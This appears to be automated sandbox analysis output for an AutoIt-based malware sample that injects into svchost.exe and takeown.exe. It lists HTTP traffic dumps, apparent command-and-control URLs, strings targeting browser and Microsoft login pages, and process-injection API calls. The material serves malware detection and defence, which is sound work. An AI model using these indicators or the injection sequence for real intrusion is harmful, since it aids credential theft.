72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3703579679.0000000000E8D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kakeksakti43.cfd
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3703579679.0000000000E8D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kakeksakti43.cfd/37iq/
                Source: takeown.exe, 0000000A.00000002.3704350785.0000000004226000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.0000000002BC6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.nan21.ro
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: takeown.exe, 0000000A.00000002.3704350785.000000000486E000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000320E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: takeown.exe, 0000000A.00000002.3704350785.000000000486E000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000320E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: takeown.exe, 0000000A.00000003.1605072602.0000000007E4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: takeown.exe, 0000000A.00000002.3702052200.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: takeown.exe, 0000000A.00000002.3706188752.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_01004164
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01003F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_01003F66
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_00FF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_00FF001C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_0101CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0101CABC

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: This is a third-party compiled AutoIt script.0_2_00F93B3A
                Source: arGdXDmyGJ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: arGdXDmyGJ.exe, 00000000.00000002.1234487161.0000000001044000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_212b9fd1-3
                Source: arGdXDmyGJ.exe, 00000000.00000002.1234487161.0000000001044000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f68c3d94-2
                Source: arGdXDmyGJ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8fb55844-a
                Source: arGdXDmyGJ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7215090d-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C253 NtClose,2_2_0042C253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B60 NtClose,LdrInitializeThunk,2_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031735C0 NtCreateMutant,LdrInitializeThunk,2_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174340 NtSetContextThread,2_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03174650 NtSuspendThread,2_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172B80 NtQueryInformationFile,2_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BA0 NtEnumerateValueKey,2_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BF0 NtAllocateVirtualMemory,2_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172BE0 NtQueryValueKey,2_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AB0 NtWaitForSingleObject,2_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AD0 NtReadFile,2_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172AF0 NtWriteFile,2_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F30 NtCreateSection,2_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F60 NtCreateProcessEx,2_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172F90 NtProtectVirtualMemory,2_2_03172F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FB0 NtResumeThread,2_2_03172FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FA0 NtQuerySection,2_2_03172FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172FE0 NtCreateFile,2_2_03172FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E30 NtWriteVirtualMemory,2_2_03172E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172E80 NtReadVirtualMemory,2_2_03172E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EA0 NtAdjustPrivilegesToken,2_2_03172EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172EE0 NtQueueApcThread,2_2_03172EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D10 NtMapViewOfSection,2_2_03172D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D00 NtSetInformationFile,2_2_03172D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172D30 NtUnmapViewOfSection,2_2_03172D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DB0 NtEnumerateKey,2_2_03172DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172DD0 NtDelayExecution,2_2_03172DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C00 NtQueryInformationProcess,2_2_03172C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C70 NtFreeVirtualMemory,2_2_03172C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172C60 NtCreateKey,2_2_03172C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CA0 NtQueryInformationToken,2_2_03172CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CC0 NtQueryVirtualMemory,2_2_03172CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172CF0 NtOpenProcess,2_2_03172CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173010 NtOpenDirectoryObject,2_2_03173010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173090 NtSetValueKey,2_2_03173090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031739B0 NtGetContextThread,2_2_031739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D10 NtOpenProcessToken,2_2_03173D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03173D70 NtOpenThread,2_2_03173D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F4340 NtSetContextThread,LdrInitializeThunk,10_2_036F4340
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F4650 NtSuspendThread,LdrInitializeThunk,10_2_036F4650
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2B60 NtClose,LdrInitializeThunk,10_2_036F2B60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_036F2BE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_036F2BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_036F2BA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AF0 NtWriteFile,LdrInitializeThunk,10_2_036F2AF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AD0 NtReadFile,LdrInitializeThunk,10_2_036F2AD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F30 NtCreateSection,LdrInitializeThunk,10_2_036F2F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FE0 NtCreateFile,LdrInitializeThunk,10_2_036F2FE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FB0 NtResumeThread,LdrInitializeThunk,10_2_036F2FB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_036F2EE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_036F2E80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_036F2D30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_036F2D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_036F2DF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,10_2_036F2DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C60 NtCreateKey,LdrInitializeThunk,10_2_036F2C60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_036F2C70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_036F2CA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F35C0 NtCreateMutant,LdrInitializeThunk,10_2_036F35C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F39B0 NtGetContextThread,LdrInitializeThunk,10_2_036F39B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2B80 NtQueryInformationFile,10_2_036F2B80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2AB0 NtWaitForSingleObject,10_2_036F2AB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F60 NtCreateProcessEx,10_2_036F2F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2FA0 NtQuerySection,10_2_036F2FA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2F90 NtProtectVirtualMemory,10_2_036F2F90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2E30 NtWriteVirtualMemory,10_2_036F2E30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2EA0 NtAdjustPrivilegesToken,10_2_036F2EA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2D00 NtSetInformationFile,10_2_036F2D00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2DB0 NtEnumerateKey,10_2_036F2DB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2C00 NtQueryInformationProcess,10_2_036F2C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CF0 NtOpenProcess,10_2_036F2CF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F2CC0 NtQueryVirtualMemory,10_2_036F2CC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3010 NtOpenDirectoryObject,10_2_036F3010
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3090 NtSetValueKey,10_2_036F3090
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3D70 NtOpenThread,10_2_036F3D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_036F3D10 NtOpenProcessToken,10_2_036F3D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F28F60 NtCreateFile,10_2_02F28F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F29260 NtClose,10_2_02F29260
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F293C0 NtAllocateVirtualMemory,10_2_02F293C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F290D0 NtReadFile,10_2_02F290D0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02F291C0 NtDeleteFile,10_2_02F291C0
